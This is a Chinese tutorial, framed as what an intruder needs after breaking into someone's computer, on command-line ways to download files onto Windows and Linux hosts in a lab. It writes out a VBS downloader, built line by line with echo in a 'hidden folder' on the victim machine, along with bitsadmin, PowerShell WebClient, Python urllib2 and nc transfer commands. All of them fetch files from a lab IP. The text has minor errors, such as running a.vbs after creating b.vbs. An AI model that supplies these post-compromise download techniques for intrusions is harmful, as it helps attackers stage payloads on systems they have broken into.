入侵别人电脑后你必须要会的Linux与window系统用命令行下载网络资源的15种方式

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

window系统常见下载方式

FTP脚本

vbs脚本

bitsadmin命令

$client命令

Linux系统常见下载方式

wget

curl

lynx

fetch

Axel

aria2

youtube-dl

双方均可用

links

links2

python脚本

nc

由于使用方法都差不多这里就不全都演示了,不会的可自行百度

实验环境:

  • Windows Server 2008 R2 x64
  • IIS服务器
  • kali

环境搭建:

安装IIS服务器 在C:\inetpub\wwwroot网站目录下放一个www.rar文件并且浏览器能够访问到

模拟实验:

Windows命令下载方式

1、FTP脚本实现下载

用echo生成txt文件,ip用户名密码均为目标机的,如下:

输入ftp -s:ftp.txt执行该文件,成功下载1.rar

2、vbs脚本实现下载

在桌面创建一个文件夹将vbs脚本放进去,注意修改路径。代码如下:

代码语言:javascript
复制
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.70.128/www.rar",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2

然後双击执行,压缩文件就被下载了

但人家电脑里不会有这种文件需要你自己生成,方法如下:

进入到一个隐蔽的文件夹,然后用echo语句按顺序输入代码生成vbs脚本,如: echo Set xPost=createObject("Microsoft.XMLHTTP")>>b.vbs echo xPost.Open "GET","http://192.168.70.128/www.rar",0 >>b.vbs echo xPost.Send()>>b.vbs echo set sGet=createObject("ADODB.Stream")>>b.vbs echo sGet.Mode=3>>b.vbs echo sGet.Type=1>>b.vbs echo sGet.Open()>>b.vbs echo sGet.Open()>>b.vbs echo sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2 >>b.vbs

脚本生成后输入cscript a.vbs执行就可以下载了

3、bitsadmin命令下载

环境同上,直接输入bitsadmin /transfer n http://192.168.70.128/www.rar C:\Users\sq\Desktop\a\www.rar即可实现下载

成功下载

4、$client命令下载

环境同上,在搜索框中输入p然后以管理员身份运行poershell在命令行中依次打入client = new-object System.Net.WebClientclient.DownloadFile('http://192.168.70.128/www.rar','C:\Users\sq\Desktop\www.rar')前面是网站路径,后面是保存路径,文件名可换

Linux命令下载方式

1、wget命令下载

这个使用起来很简单,直接输入wget+网址就可以了,加-p参数还可以指定文件夹,如果文件夹不存在会自动创建

2、curl命令下载

这个命令需要在网址后加–output参数,后面跟文件名即可

3、python脚本实现下载

创建一个xiazai.py文件修改地址然后执行即可,python代码如下:

代码语言:javascript
复制
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.70.128/www.rar')
localFile = open('1.rar', 'w')
localFile.write(u.read())
localFile.close()

4、nc命令下载

这个方法需要两台机器都有nc,然后目标服务器开放端口,自己在进行接收就可以了,方法如下:

我们开启两个终端,当做是两台服务器,目标端输入cat 1.rar | nc -lvvp 1234开始监听,本地输入nc 127.0.0.1 1234 > 1.rar接收 注意:这里因为是一台机器演示所以用127.0.0.1,真实情况换成网站地址或ip即可,还有执行完后它不会自动退出,你感觉下载完了就Ctrl+C终止

下完后我们可以ls -l看一下文件字节数是否相同